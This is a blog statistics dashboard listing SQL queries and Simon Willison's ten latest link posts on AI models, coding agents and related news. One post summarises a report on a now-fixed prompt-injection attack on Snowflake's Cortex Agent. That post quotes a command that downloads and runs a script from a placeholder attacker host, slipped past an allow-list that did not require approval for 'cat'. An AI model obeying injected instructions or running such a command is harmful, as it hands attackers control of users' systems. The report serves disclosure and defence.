Example dashboard

Various statistics from my blog.

Owned by simonw, visibility: Public

Entries

3281

SQL query
select 'Entries' as label, count(*) as big_number from blog_entry

Blogmarks

8318

SQL query
select 'Blogmarks' as label, count(*) as big_number from blog_blogmark

Quotations

1357

SQL query
select 'Quotations' as label, count(*) as big_number from blog_quotation

Chart of number of entries per month over time

SQL query
select '<h2>Chart of number of entries per month over time</h2>' as html
SQL query
select to_char(date_trunc('month', created), 'YYYY-MM') as bar_label,
count(*) as bar_quantity from blog_entry group by bar_label order by count(*) desc

Ten most recent blogmarks (of 8318 total)

SQL query
select '## Ten most recent blogmarks (of ' || count(*) || ' total)' as markdown from blog_blogmark
SQL query
select link_title, link_url, commentary, created from blog_blogmark order by created desc limit 10

10 rows

link_title link_url commentary created
Turbo Pascal 3.02A, deconstructed https://tools.simonwillison.net/turbo-pascal-deconstructed In [Things That Turbo Pascal is Smaller Than](https://prog21.dadgum.com/116.html) James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler. This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me. It did a great job, so I had it create [this interactive artifact](https://tools.simonwillison.net/turbo-pascal-deconstructed) illustrating the result. Here's the [sequence of prompts](https://claude.ai/share/260d2eed-8d4a-4b9f-8a75-727c3ec4274e) I used (in regular [claude.ai](https://claude.ai/) chat, not Claude Code): > Read this https://prog21.dadgum.com/116.html > Now find a copy of that binary online > Explore this (*I attached the zip file*) > Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations ![Infographic titled "TURBO.COM" with subtitle "Borland Turbo Pascal 3.02A — September 17, 1986 — Deconstructed" on a dark background. Four statistics are displayed: 39,731 TOTAL BYTES, 17 SEGMENTS MAPPED, 1 INT 21H INSTRUCTION, 100+ BUILT-IN IDENTIFIERS. Below is a "BINARY MEMORY MAP — 0X0100 TO 0X9C33" shown as a horizontal color-coded bar chart with a legend listing 17 segments: COM Header & Copyright, Display Configuration Table, Screen I/O & Video BIOS Routines, Keyboard Input Handler, String Output & Number Formatting, DOS System Call Dispatcher, Runtime Library Core, Error Handler & Runtime Errors, File I/O System, Software Floating-Point Engine, x86 Code Generator, Startup Banner & Main Menu Loop, File Manager & Directory Browser, Compiler Driver & Status, Full-Screen Text Editor, Pascal Parser & Lexer, and Symbol Table & Built-in Identifiers.](https://static.simonwillison.net/static/2026/turbo-pascal.jpg) 2026-03-20 23:59:14+00:00
Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally https://twitter.com/danveloper/status/2034353876753592372 Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of [Qwen3.5-397B-A17B](https://huggingface.co/Qwen/Qwen3.5-397B-A17B/tree/main) running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk. Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time. Dan used techniques described in Apple's 2023 paper [LLM in a flash: Efficient Large Language Model Inference with Limited Memory](https://arxiv.org/abs/2312.11514): > This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks. He fed the paper to Claude Code and used a variant of Andrej Karpathy's [autoresearch pattern](https://simonwillison.net/2026/Mar/13/liquid/) to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible. [danveloper/flash-moe](https://github.com/danveloper/flash-moe) has the resulting code plus [a PDF paper](https://github.com/danveloper/flash-moe/blob/main/paper/flash_moe.pdf) mostly written by Claude Opus 4.6 describing the experiment in full. The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running. Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3. It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin. **Update**: Dan's [latest version](https://twitter.com/danveloper/status/2034686509748462022) upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well. 2026-03-18 23:56:46+00:00
Snowflake Cortex AI Escapes Sandbox and Executes Malware https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware PromptArmor report on a prompt injection attack chain in Snowflake's [Cortex Agent](https://docs.snowflake.com/en/user-guide/snowflake-cortex/cortex-agents), now fixed. The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README. The attack caused the agent to execute this code: cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) Cortex listed `cat` commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command. I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me. I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself. 2026-03-18 17:43:49+00:00
Introducing Mistral Small 4 https://mistral.ai/news/mistral-small-4 Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this: > Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model. It supports `reasoning_effort="none"` or `reasoning_effort="high"`, with the latter providing "equivalent verbosity to previous Magistral models". The new model is [242GB on Hugging Face](https://huggingface.co/mistralai/Mistral-Small-4-119B-2603/tree/main). I [tried it out](https://gist.github.com/simonw/3dec228577559f15f26204a3cc550583) via the Mistral API using [llm-mistral](https://github.com/simonw/llm-mistral): llm install llm-mistral llm mistral refresh llm -m mistral/mistral-small-2603 "Generate an SVG of a pelican riding a bicycle" ![The bicycle is upside down and mangled and the pelican is a series of grey curves with a triangular beak.](https://static.simonwillison.net/static/2026/mistral-small-4.png) I couldn't find a way to set the reasoning effort in their [API documentation](https://docs.mistral.ai/api/endpoint/chat#operation-chat_completion_v1_chat_completions_post), so hopefully that's a feature which will land soon. Also from Mistral today and fitting their -stral naming convention is [Leanstral](https://mistral.ai/news/leanstral), an open weight model that is specifically tuned to help output the [Lean 4](https://lean-lang.org/) formally verifiable coding language. I haven't explored Lean at all so I have no way to credibly evaluate this, but it's interesting to see them target one specific language in this way. 2026-03-16 23:41:17+00:00
Use subagents and custom agents in Codex https://developers.openai.com/codex/subagents Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag. They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel. Codex also lets you define custom agents as TOML files in `~/.codex/agents/`. These can have custom instructions and be assigned to use specific models - including `gpt-5.3-codex-spark` if you want [some raw speed](https://simonwillison.net/2026/Feb/12/codex-spark/). They can then be referenced by name, as demonstrated by this example prompt from the documentation: > `Investigate why the settings modal fails to save. Have browser_debugger reproduce it, code_mapper trace the responsible code path, and ui_fixer implement the smallest fix once the failure mode is clear.` The subagents pattern is widely supported in coding agents now. Here's documentation across a number of different platforms: - [OpenAI Codex subagents](https://developers.openai.com/codex/subagents/) - [Claude Code subagents](https://code.claude.com/docs/en/sub-agents) - [Gemini CLI subagents](https://geminicli.com/docs/core/subagents/) (experimental) - [Mistral Vibe subagents](https://docs.mistral.ai/mistral-vibe/agents-skills#agent-selection) - [OpenCode agents](https://opencode.ai/docs/agents/) - [Subagents in Visual Studio Code](https://code.visualstudio.com/docs/copilot/agents/subagents) - [Cursor Subagents](https://cursor.com/docs/subagents) **Update**: I added [a chapter on Subagents](https://simonwillison.net/guides/agentic-engineering-patterns/subagents/) to my Agentic Engineering Patterns guide. 2026-03-16 23:03:56+00:00
Coding agents for data analysis https://simonw.github.io/nicar-2026-coding-agents/ Here's the handout I prepared for my NICAR 2026 workshop "Coding agents for data analysis" - a three hour session aimed at data journalists demonstrating ways that tools like Claude Code and OpenAI Codex can be used to explore, analyze and clean data. Here's the table of contents: > - [Coding agents](https://simonw.github.io/nicar-2026-coding-agents/coding-agents.html) > - [Warmup: ChatGPT and Claude](https://simonw.github.io/nicar-2026-coding-agents/warmup.html) > - [Setup Claude Code and Codex](https://simonw.github.io/nicar-2026-coding-agents/setup.html) > - [Asking questions against a database](https://simonw.github.io/nicar-2026-coding-agents/asking-questions.html) > - [Exploring data with agents](https://simonw.github.io/nicar-2026-coding-agents/exploring-data.html) > - [Cleaning data: decoding neighborhood codes](https://simonw.github.io/nicar-2026-coding-agents/cleaning-trees.html) > - [Creating visualizations with agents](https://simonw.github.io/nicar-2026-coding-agents/visualizations.html) > - [Scraping data with agents](https://simonw.github.io/nicar-2026-coding-agents/scraping.html) I ran the workshop using GitHub Codespaces and OpenAI Codex, since it was easy (and inexpensive) to distribute a budget-restricted API key for Codex that attendees could use during the class. Participants ended up burning $23 of Codex tokens. The exercises all used Python and SQLite and some of them used Datasette. One highlight of the workshop was when we started [running Datasette](https://simonw.github.io/nicar-2026-coding-agents/visualizations.html#javascript-visualizations) such that it served static content from a `viz/` folder, then had Claude Code start vibe coding new interactive visualizations directly in that folder. Here's a heat map it created for my trees database using Leaflet and [Leaflet.heat](https://github.com/Leaflet/Leaflet.heat), [source code here](https://gist.github.com/simonw/985ae2a6a3cd3df3fd375eb58dabea0f). ![Screenshot of a "Trees SQL Map" web application with the heading "Trees SQL Map" and subheading "Run a query and render all returned points as a heat map. The default query targets roughly 200,000 trees." Below is an input field containing "/trees/-/query.json", a "Run Query" button, and a SQL query editor with the text "SELECT cast(Latitude AS float) AS latitude, cast(Longitude AS float) AS longitude, CASE WHEN DBH IS NULL OR DBH = '' THEN 0.3 WHEN cast(DBH AS float) <= 0 THEN 0.3 WHEN cast(DBH AS float) >= 80 THEN 1.0" (query is truncated). A status message reads "Loaded 1,000 rows and plotted 1,000 points as heat map." Below is a Leaflet/OpenStreetMap interactive map of San Francisco showing a heat map overlay of tree locations, with blue/green clusters concentrated in areas like the Richmond District, Sunset District, and other neighborhoods. Map includes zoom controls and a "Leaflet | © OpenStreetMap contributors" attribution.](https://static.simonwillison.net/static/2026/tree-sql-map.jpg) I designed the handout to also be useful for people who weren't able to attend the session in person. As is usually the case, material aimed at data journalists is equally applicable to anyone else with data to explore. 2026-03-16 20:12:32+00:00
1M context is now generally available for Opus 4.6 and Sonnet 4.6 https://claude.com/blog/1m-context-ga Here's what surprised me: > Standard pricing now applies across the full 1M window for both models, with no long-context premium. OpenAI and Gemini both [charge more](https://www.llm-prices.com/#sel=gemini-3-1-pro-preview-200k%2Cgpt-5.4-272k%2Cgemini-3-1-pro-preview%2Cgpt-5.4) for prompts where the token count goes above a certain point - 200,000 for Gemini 3.1 Pro and 272,000 for GPT-5.4. 2026-03-13 18:29:13+00:00
Shopify/liquid: Performance: 53% faster parse+render, 61% fewer allocations https://github.com/Shopify/liquid/pull/2056 PR from Shopify CEO Tobias Lütke against Liquid, Shopify's open source Ruby template engine that was somewhat inspired by Django when Tobi first created it [back in 2005](https://simonwillison.net/2005/Nov/6/liquid/). Tobi found dozens of new performance micro-optimizations using a variant of [autoresearch](https://github.com/karpathy/autoresearch), Andrej Karpathy's new system for having a coding agent run hundreds of semi-autonomous experiments to find new effective techniques for training [nanochat](https://github.com/karpathy/nanochat). Tobi's implementation started two days ago with this [autoresearch.md](https://github.com/Shopify/liquid/blob/2543fdc1a101f555db208fb0deeb2e3bf1ae9e36/auto/autoresearch.md) prompt file and an [autoresearch.sh](https://github.com/Shopify/liquid/blob/2543fdc1a101f555db208fb0deeb2e3bf1ae9e36/auto/autoresearch.sh) script for the agent to run to execute the test suite and report on benchmark scores. The PR now lists [93 commits](https://github.com/Shopify/liquid/pull/2056/commits) from around 120 automated experiments. The PR description lists what worked in detail - some examples: > - **Replaced StringScanner tokenizer with `String#byteindex`.** Single-byte `byteindex` searching is ~40% faster than regex-based `skip_until`. This alone reduced parse time by ~12%. > - **Pure-byte `parse_tag_token`.** Eliminated the costly `StringScanner#string=` reset that was called for every `{% %}` token (878 times). Manual byte scanning for tag name + markup extraction is faster than resetting and re-scanning via StringScanner. [...] > - **Cached small integer `to_s`.** Pre-computed frozen strings for 0-999 avoid 267 `Integer#to_s` allocations per render. This all added up to a 53% improvement on benchmarks - truly impressive for a codebase that's been tweaked by hundreds of contributors over 20 years. I think this illustrates a number of interesting ideas: - Having a robust test suite - in this case 974 unit tests - is a *massive unlock* for working with coding agents. This kind of research effort would not be possible without first having a tried and tested suite of tests. - The autoresearch pattern - where an agent brainstorms a multitude of potential improvements and then experiments with them one at a time - is really effective. - If you provide an agent with a benchmarking script "make it faster" becomes an actionable goal. - CEOs can code again! Tobi has always been more hands-on than most, but this is a much more significant contribution than anyone would expect from the leader of a company with 7,500+ employees. I've seen this pattern play out a lot over the past few months: coding agents make it feasible for people in high-interruption roles to productively work with code again. Here's Tobi's [GitHub contribution graph](https://github.com/tobi) for the past year, showing a significant uptick following that [November 2025 inflection point](https://simonwillison.net/tags/november-2025-inflection/) when coding agents got really good. ![1,658 contributions in the last year - scattered lightly through Jun, Aug, Sep, Oct and Nov and then picking up significantly in Dec, Jan, and Feb.](https://static.simonwillison.net/static/2026/tobi-contribs.jpg) He used [Pi](https://github.com/badlogic/pi-mono) as the coding agent and released a new [pi-autoresearch](https://github.com/davebcn87/pi-autoresearch) plugin in collaboration with David Cortés, which maintains state in an `autoresearch.jsonl` file [like this one](https://github.com/Shopify/liquid/blob/3182b7c1b3758b0f5fe2d0fcc71a48bbcb11c946/autoresearch.jsonl). 2026-03-13 03:44:34+00:00
MALUS - Clean Room as a Service https://malus.sh/ Brutal satire on the whole vibe-porting license washing thing ([previously](https://simonwillison.net/2026/Mar/5/chardet/)): > Finally, liberation from open source license obligations. > > Our proprietary AI robots independently recreate any open source project from scratch. The result? **Legally distinct code** with corporate-friendly licensing. No attribution. No copyleft. No problems.. I admit it took me a moment to confirm that this was a joke. Just too on-the-nose. 2026-03-12 20:08:55+00:00
Coding After Coders: The End of Computer Programming as We Know It https://www.nytimes.com/2026/03/12/magazine/ai-coding-programming-jobs-claude-chatgpt.html?unlocked_article_code=1.SlA.DBan.wbQDi-hptjj6 Epic piece on AI-assisted development by Clive Thompson for the New York Times Magazine, who spoke to more than 70 software developers from companies like Google, Amazon, Microsoft, Apple, plus other individuals including Anil Dash, Thomas Ptacek, Steve Yegge, and myself. I think the piece accurately and clearly captures what's going on in our industry right now in terms appropriate for a wider audience. I talked to Clive a few weeks ago. Here's the quote from me that made it into the piece. > Given A.I.’s penchant to hallucinate, it might seem reckless to let agents push code out into the real world. But software developers point out that coding has a unique quality: They can tether their A.I.s to reality, because they can demand the agents test the code to see if it runs correctly. “I feel like programmers have it easy,” says Simon Willison, a tech entrepreneur and an influential blogger about how to code using A.I. “If you’re a lawyer, you’re screwed, right?” There’s no way to automatically check a legal brief written by A.I. for hallucinations — other than face total humiliation in court. The piece does raise the question of what this means for the future of our chosen line of work, but the general attitude from the developers interviewed was optimistic - there's even a mention of the possibility that the Jevons paradox might increase demand overall. One critical voice came from an Apple engineer: > A few programmers did say that they lamented the demise of hand-crafting their work. “I believe that it can be fun and fulfilling and engaging, and having the computer do it for you strips you of that,” one Apple engineer told me. (He asked to remain unnamed so he wouldn’t get in trouble for criticizing Apple’s embrace of A.I.) That request to remain anonymous is a sharp reminder that corporate dynamics may be suppressing an unknown number of voices on this topic. 2026-03-12 19:23:44+00:00
Copy and export data

Duration: 4.42ms